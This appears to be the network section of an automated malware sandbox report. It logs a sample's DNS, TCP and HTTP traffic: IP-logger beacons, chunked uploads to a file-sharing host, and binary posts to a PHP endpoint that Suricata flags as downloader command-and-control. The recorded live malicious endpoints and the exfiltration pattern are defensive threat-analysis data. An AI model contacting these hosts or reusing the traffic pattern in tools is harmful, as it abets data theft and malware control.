Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
up.ufile.io | 104.27.194.88 | |
hirezz.com | 162.144.12.143 | |
iplogger.org | 88.99.66.31 |
- TCP Requests
-
-
192.168.56.102:49812 104.27.194.88:443up.ufile.io
-
192.168.56.102:49813 104.27.194.88:443up.ufile.io
-
192.168.56.102:49814 104.27.194.88:443up.ufile.io
-
192.168.56.102:49807 162.144.12.143:80hirezz.com
-
192.168.56.102:49809 162.144.12.143:80hirezz.com
-
192.168.56.102:49797 172.217.25.14:443
-
192.168.56.102:49811 88.99.66.31:443iplogger.org
-
- UDP Requests
-
-
192.168.56.102:50839 164.124.101.2:53
-
192.168.56.102:57660 164.124.101.2:53
-
192.168.56.102:61459 164.124.101.2:53
-
192.168.56.102:137 192.168.56.255:137
-
192.168.56.102:138 192.168.56.255:138
-
192.168.56.102:49152 239.255.255.250:3702
-
192.168.56.102:56752 239.255.255.250:1900
-
192.168.56.102:56754 239.255.255.250:3702
-
192.168.56.102:56756 239.255.255.250:3702
-
192.168.56.102:57661 239.255.255.250:3702
-
8.8.8.8:53 192.168.56.102:57660
-
GET
200
https://iplogger.org/1ib2a7
REQUEST
RESPONSE
BODY
GET /1ib2a7 HTTP/1.1
Host: iplogger.org
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 23 Apr 2021 01:07:48 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=h6g3fea45tea20omfp2hctfsb0; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=259908123; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: 2d939b5aee78649ba5dcf483ea0aaa5e19e86948b4778e339f04998c89927566
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
POST
200
https://up.ufile.io/v1/upload/create_session
REQUEST
RESPONSE
BODY
POST /v1/upload/create_session HTTP/1.1
Host: up.ufile.io
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 23 Apr 2021 01:07:50 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 43
Connection: keep-alive
Set-Cookie: __cfduid=ded21f4c5f8147145d2b9fdf1a8cb446c1619140069; expires=Sun, 23-May-21 01:07:49 GMT; path=/; domain=.ufile.io; HttpOnly; SameSite=Lax; Secure
Access-Control-Allow-Origin:
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept, Access-Control-Request-Method, Access-Control-Allow-Headers, x-api-key
Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, PATCH, DELETE
Access-Control-Allow-Credentials: true
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
cf-request-id: 099ddde0be0000eb8dca385000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Ifopkls6IKTqeH6yf1qq%2FLMYRSu9OjfWHU4Os5vPsFCqGTCoEmQLbKP%2FIM6FdP6kEEpVViq1vcdkWws90pfOKiZzsd6TJcUA17EUwlGeBYI8I1zYZi3p"}]}
NEL: {"report_to":"cf-nel","max_age":604800}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Set-Cookie: __cfduid=d09b566a8c613ca15b1f70ce1ab72e2511619140069; expires=Sun, 23-May-21 01:07:49 GMT; path=/; domain=.ufile.io; HttpOnly; SameSite=Lax; Secure
Set-Cookie: __cflb=0H28vJQzgt4wRhVN8rwbSixBAYxN2M9Ho7zPmpisByn; SameSite=None; Secure; path=/; expires=Sat, 24-Apr-21 01:07:50 GMT; HttpOnly
Server: cloudflare
CF-RAY: 6443327acb2feb8d-LAX
POST
200
https://up.ufile.io/v1/upload/chunk
REQUEST
RESPONSE
BODY
POST /v1/upload/chunk HTTP/1.1
Content-Type: multipart/form-data; boundary=WebKitFormBoundaryu8FzpUGNDgydoA4z
Host: up.ufile.io
Content-Length: 279975
Cache-Control: no-cache
Cookie: __cfduid=d09b566a8c613ca15b1f70ce1ab72e2511619140069; __cflb=0H28vJQzgt4wRhVN8rwbSixBAYxN2M9Ho7zPmpisByn
HTTP/1.1 200 OK
Date: Fri, 23 Apr 2021 01:07:53 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 24
Connection: keep-alive
Access-Control-Allow-Origin:
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept, Access-Control-Request-Method, Access-Control-Allow-Headers, x-api-key
Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, PATCH, DELETE
Access-Control-Allow-Credentials: true
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
cf-request-id: 099ddde61d0000362ae5399000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=eKn%2B%2FaKWK7cOOn1YfaG5XMmSqowOw1Cy1khwqeKnm2Zed0b0k%2FhqdKRwUs1vTUVdgw6ufnq99enetOnSKle3cQ%2Fmn59RK9NrDny92lT50URVNaHsfBiL"}],"group":"cf-nel"}
NEL: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Server: cloudflare
CF-RAY: 644332835c38362a-LAX
POST
200
https://up.ufile.io/v1/upload/finalise
REQUEST
RESPONSE
BODY
POST /v1/upload/finalise HTTP/1.1
Host: up.ufile.io
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Cache-Control: no-cache
Cookie: __cfduid=d09b566a8c613ca15b1f70ce1ab72e2511619140069; __cflb=0H28vJQzgt4wRhVN8rwbSixBAYxN2M9Ho7zPmpisByn
HTTP/1.1 200 OK
Date: Fri, 23 Apr 2021 01:07:54 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin:
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept, Access-Control-Request-Method, Access-Control-Allow-Headers, x-api-key
Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, PATCH, DELETE
Access-Control-Allow-Credentials: true
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
cf-request-id: 099dddf11d000042eafba3f000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=1EFKp8QO0GNep%2Ffqm7q7XWt72lVs3CdTf%2FsH2rCo2ntyRsVlhlGnezY06bDu8slBxzbc2nP7fpr2B%2BsKqLBWLpK57h%2FPERYGaUywSbf%2F7VloAw6TO3ZR"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Server: cloudflare
CF-RAY: 64433294fe3f42ea-LAX
GET
200
http://hirezz.com/test/includes/image.php
REQUEST
RESPONSE
BODY
GET /test/includes/image.php HTTP/1.1
Connection: Keep-Alive
Host: hirezz.com
HTTP/1.1 200 OK
Date: Fri, 23 Apr 2021 01:07:43 GMT
Server: nginx/1.19.5
Content-Type: text/html; charset=UTF-8
Content-Length: 12
X-Server-Cache: true
X-Proxy-Cache: HIT
GET
200
http://hirezz.com/test/includes/image.php?id=00009CF9F2321904909678
REQUEST
RESPONSE
BODY
GET /test/includes/image.php?id=00009CF9F2321904909678 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: hirezz.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 23 Apr 2021 01:07:44 GMT
Server: nginx/1.19.5
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
X-Server-Cache: false
Transfer-Encoding: chunked
POST
200
http://hirezz.com/test/includes/image.php
REQUEST
RESPONSE
BODY
POST /test/includes/image.php HTTP/1.1
Content-Type: application/octet-stream
Content-Encoding: binary
Host: hirezz.com
Content-Length: 62222
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 23 Apr 2021 01:07:46 GMT
Server: Apache
Content-Length: 2
Content-Type: text/html; charset=UTF-8
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.102:49812 -> 104.27.194.88:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.102:49813 -> 104.27.194.88:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.102:49809 -> 162.144.12.143:80 | 2032342 | ET MALWARE Win32/Unk Downloader CnC Activity | Malware Command and Control Activity Detected |
TCP 192.168.56.102:49814 -> 104.27.194.88:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.102:49811 -> 88.99.66.31:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.102:49812 104.27.194.88:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 47:ea:38:25:90:4e:67:30:f9:3d:f5:b5:f2:9a:2a:da:67:5a:ef:97 |
TLSv1 192.168.56.102:49813 104.27.194.88:443 |
None | None | None |
TLSv1 192.168.56.102:49814 104.27.194.88:443 |
None | None | None |
TLSv1 192.168.56.102:49811 88.99.66.31:443 |
C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA | CN=*.iplogger.org | 55:1e:13:99:46:1c:67:40:a3:48:7f:38:0d:16:e7:51:f4:c4:43:cb |
Snort Alerts
No Snort Alerts